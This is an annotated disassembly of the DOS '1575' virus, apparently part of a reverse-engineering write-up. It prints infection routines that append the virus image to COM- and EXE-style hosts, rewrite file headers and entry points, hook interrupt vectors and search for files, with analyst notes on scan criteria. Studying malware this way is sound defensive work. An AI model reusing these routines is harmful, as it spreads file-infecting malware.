📄 1575病毒源程序分析(1) .txt
clc ; Clear carry flag
retn
db 0CDh, 20h
loc_10:
cmp ax,22Dh
je loc_11 ; Jump if equal
push ds
pop es
push cs
pop ds
mov ax,data_26
mov ss,ax
xchg bp,sp
mov si,13Ch
mov di,0
mov cx,10h
cld ; Clear direction
repne movsb ; Rep while cx>0 Mov [si] to es:[di]
jmp loc_3 ; (018C)
sub_1 endp
;---------------------------------------------------------------------
; SUBROUTINE
;---------------------------------------------------------------------
;-----------------------------------------------------------------------
; sub_3 -- file infection routine, reached from sub_1 via `je loc_11`.
; Appends the 627h (1575) byte image at ds:100h..727h to the file named
; at ds:219h, padding first so the image starts on a 16-byte boundary,
; then replaces the file's first 0Ch bytes with the 0Ch bytes at ds:31Bh.
; In:    ds = segment holding the name string (219h), the 12-byte save
;             buffer (10Bh) and the image to append (100h)
;        es = target segment of the stosw at 31Fh; it is not set here,
;             so it must already equal ds on this path -- TODO confirm
;             at the call site
; Out:   host file rewritten and closed; ax/bx/cx/dx/di undefined.
;        Returns immediately (nothing written) if the open fails.
; Writes: data_7e ('C' marker), data_4e (RTC month), data_1e (handle),
;         es:[31Fh] (image offset in paragraphs)
; Analyst notes: only the low word of the file size is used (dx from the
; seek is discarded), and the pad bytes are copied from just below
; ds:100h. Infected files grow by 1575 + 0..15 bytes and have their
; first 12 bytes rewritten -- both usable as scan criteria.
;-----------------------------------------------------------------------
sub_3 proc near
loc_11:
mov al,43h ; 'C' -- marker byte (sub_4 stores 'E' the same way; presumably a host-type tag)
mov ds:data_7e,al
mov al,8
out 70h,al ; select CMOS RTC register 08h (month)
in al,71h ; read it back
mov ds:data_4e,al ; latch the current month (its use is not visible in this listing)
mov dx,219h ; ds:dx -> ASCIIZ path of the candidate host
mov ax,3D02h ; DOS open, access mode 2 = read/write
int 21h
jnc loc_12 ; CF clear = success, ax = handle
retn ; open failed -> give up silently
loc_12:
mov ds:data_1e,ax ; keep the handle in memory; it is reloaded before each call below
mov dx,10Bh ; ds:dx -> 12-byte save area for the host's original start
mov bx,ds:data_1e
mov cx,0Ch ; 12 bytes
mov ah,3Fh ; DOS read
int 21h ; host's original first 12 bytes now sit at ds:10Bh, inside the image that gets appended
mov ax,4202h ; lseek(handle, 0, SEEK_END) -> dx:ax = file size
xor cx,cx
xor dx,dx
int 21h ; only ax (low word) is used below; dx is ignored
push ax ; [sp] = original size (low word)
add ax,10h
and ax,0FFF0h ; round up to the next multiple of 16 = offset where the image will start
push ax ; [sp] = rounded size
shr ax,1
shr ax,1
shr ax,1
shr ax,1 ; rounded size / 16 = image offset in paragraphs
mov di,31Fh
stosw ; es:[31Fh] = paragraph offset; lies inside the 31Bh..326h block written below if es = ds
pop ax ; ax = rounded size
pop bx ; bx = original size
sub ax,bx ; ax = pad = rounded - original, in 0..15
mov cx,627h ; 1575 = image length
add cx,ax ; bytes to write = pad + 1575
mov dx,100h
sub dx,ax ; ds:dx = 100h - pad, so the pad comes from the bytes just below the image
mov bx,ds:data_1e
mov ah,40h ; DOS write; file pointer is at EOF, so this appends
int 21h
mov ax,4200h ; lseek(handle, 0, SEEK_SET)
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ; DOS write
mov bx,ds:data_1e
mov cx,0Ch ; 12 bytes
mov dx,31Bh ; ds:31Bh = replacement start-of-file block
int 21h ; host's first 12 bytes are overwritten; the originals travel at ds:10Bh in the appended image
mov ah,3Eh ; DOS close
mov bx,ds:data_1e
int 21h
retn
sub_3 endp
; 12 bytes the disassembler left as data; decoded by hand they are code:
;   0Eh           push cs
;   8Ch 0C8h      mov  ax,cs
;   05 01 00      add  ax,1
;   50h           push ax
;   0B8h 00 01    mov  ax,100h
;   50h           push ax
;   0CBh          retf           ; far return to (cs+1):100h
; Nothing in the visible lines jumps here; presumably a control-transfer
; stub to an image one paragraph above cs -- confirm against the caller.
db 0Eh, 8Ch, 0C8h, 5, 1, 0
db 50h, 0B8h, 0, 1, 50h, 0CBh
;---------------------------------------------------------------------
; SUBROUTINE
;---------------------------------------------------------------------
;-----------------------------------------------------------------------
; sub_4 -- EXE-style infection routine (stores an 'E' marker; sub_3 is
; the 'C' counterpart). Appends the 627h (1575) byte image at
; ds:100h..727h to the file named at ds:219h on a 16-byte boundary and
; rewrites the MZ header in place so that the entry point lands at
; offset 100h of the appended image. The four header words it replaces
; are copied aside first, presumably so the virus can return to the host.
; In:    ds = segment holding the name string (219h), the 24-byte header
;             buffer (10Bh..122h) and the image to append (100h)
; Out:   host rewritten and closed; returns immediately if the open fails
; Writes: ds:[724h] ('E'), data_34 (RTC month), data_26 (handle),
;         data_24:data_25 (rounded size), data_15/data_16 (new size
;         fields), data_22/23/29/30 (saved originals), data_18..data_21
; Analyst notes: data_15..data_23 are not resolved in this listing; the
; roles given below are inferred from the MZ header layout (offset 2 =
; bytes in last page, 4 = pages, 8 = header paragraphs, 0Eh/10h = SS:SP,
; 14h/16h = IP:CS) and should be confirmed against the data segment.
; The `inc ax` after the page division is unconditional, so the stored
; page count is one too high when the file length is a multiple of 200h.
;-----------------------------------------------------------------------
sub_4 proc near
mov al,45h ; 'E' -- marker byte
mov byte ptr ds:[724h],al ; 724h is inside the 100h..727h image, so the marker is carried into every infected file
mov al,8
out 70h,al ; select CMOS RTC register 08h (month)
in al,71h ; read it back
mov data_34,al ; latch the current month (use not visible here)
mov dx,219h ; ds:dx -> ASCIIZ path of the candidate host
mov ax,3D02h ; DOS open, access mode 2 = read/write
int 21h
jnc loc_13 ; CF clear = success, ax = handle
retn ; open failed -> give up silently
loc_13:
mov data_26,ax ; handle kept in memory; bx is reloaded from it below
mov dx,10Bh ; ds:dx -> header buffer
mov bx,data_26
mov cx,18h ; 24 bytes = MZ header bytes 0..17h
mov ah,3Fh ; DOS read
int 21h ; header copy now at ds:10Bh (10Bh = 'MZ', 10Dh = header offset 2, ...)
mov ax,4202h ; lseek(handle, 0, SEEK_END) -> dx:ax = file size (both words used here, unlike sub_3)
mov cx,0
mov dx,0
int 21h
push ax ; [sp] = original size, low word
add ax,10h
adc dx,0 ; 32-bit round-up ...
and ax,0FFF0h ; ... to the next multiple of 16 = file offset of the appended image
mov data_24,dx ; data_24:data_25 = rounded size (hi:lo)
mov data_25,ax
mov cx,727h
sub cx,100h ; cx = 627h = 1575 = image length
add ax,cx
adc dx,0 ; dx:ax = new total file length
mov cx,200h
div cx ; ax = 512-byte pages, dx = bytes in the last page
inc ax ; +1 even when dx = 0 (see header note)
mov data_16,ax ; inferred: header offset 4, page count
mov data_15,dx ; inferred: header offset 2, bytes in last page
mov ax,data_21 ; save the four header words that are about to be replaced
mov data_22,ax ; (inferred: original CS)
mov ax,data_20
mov data_23,ax ; (inferred: original IP)
mov ax,data_18
mov data_29,ax ; (inferred: original SS)
mov ax,data_19
mov data_30,ax ; (inferred: original SP)
mov dx,data_24
mov ax,data_25 ; dx:ax = rounded size again
mov cx,10h
div cx ; ax = image file offset in paragraphs
sub ax,10h ; IP/SP are set to 100h below, so lower the segment by 10h paragraphs to make seg:100h hit the image start
sub ax,data_17 ; segments are relative to the load address, which follows the header (inferred: data_17 = header paragraphs)
mov data_21,ax ; new CS
mov data_18,ax ; new SS = CS
mov data_20,100h ; new IP = 100h
mov data_19,100h ; new SP = 100h
mov ax,4200h ; lseek(handle, 2, SEEK_SET) -- skip the 'MZ' signature
xor cx,cx
mov dx,2
int 21h
mov dx,10Dh ; ds:10Dh = buffered header from offset 2 onward
mov bx,data_26
mov cx,16h ; 22 bytes = header bytes 2..17h
mov ah,40h ; DOS write -- patched header goes back into the file
int 21h
mov ax,4202h ; lseek(handle, 0, SEEK_END)
xor cx,cx
xor dx,dx
int 21h
mov dx,100h
mov ax,data_25 ; rounded size, low word
pop cx ; original size, low word (pushed above)
sub ax,cx ; ax = pad = rounded - original, in 0..15
sub dx,ax ; ds:dx = 100h - pad, pad bytes come from just below the image
mov cx,727h
add cx,ax
sub cx,100h ; cx = 1575 + pad bytes to append
mov ah,40h ; DOS write; bx still holds the handle loaded before the header write
int 21h
mov ah,3Eh ; DOS close (bx = handle)
int 21h
retn
sub_4 endp
; 10 bytes the disassembler left as data; decoded by hand they are code:
;   51h           push cx
;   0B9h 00 00    mov  cx,0        ; attribute mask 0 = ordinary files only
;   0B4h 4Eh      mov  ah,4Eh
;   0CDh 21h      int  21h         ; DOS find-first, ds:dx = filespec (set by the caller)
;   59h           pop  cx
;   0C3h          ret
; Likely the directory-search primitive used to locate candidate hosts;
; no call to it is visible in this listing -- confirm the caller.
db 51h, 0B9h, 0, 0, 0B4h, 4Eh
db 0CDh, 21h, 59h, 0C3h
;---------------------------------------------------------------------
; SUBROUTINE
;---------------------------------------------------------------------
;-----------------------------------------------------------------------
; sub_5 -- record the current INT 1Ch (timer tick) and INT 21h (DOS
; services) vectors into the virus's code segment.
; In:    none
; Out:   cs:data_13 = INT 1Ch offset, cs:data_14 = INT 1Ch segment,
;        cs:data_11 = INT 21h offset, cs:data_12 = INT 21h segment
; Clobb: ax, bx; es is preserved (push/pop around the body)
; Analyst notes: what the saved vectors are used for (chaining a handler,
; calling DOS directly, restoring on exit) is not visible in this
; listing. The cs: override is presumably so the values are reachable
; when ds does not point at the virus image.
;-----------------------------------------------------------------------
sub_5 proc near
push es ; caller's es survives the two vector queries
mov ax,351Ch ; DOS get interrupt vector, al = 1Ch (timer tick)
int 21h ; es:bx = current INT 1Ch handler
mov cs:data_13,bx ; offset
mov cs:data_14,es ; segment
mov ax,3521h ; DOS get interrupt vector, al = 21h (DOS services)
int 21h ; es:bx = current INT 21h handler
push es
pop ax ; ax = es
mov cs:data_12,ax ; segment
mov cs:data_11,bx ; offset
pop es
retn
sub_5 endp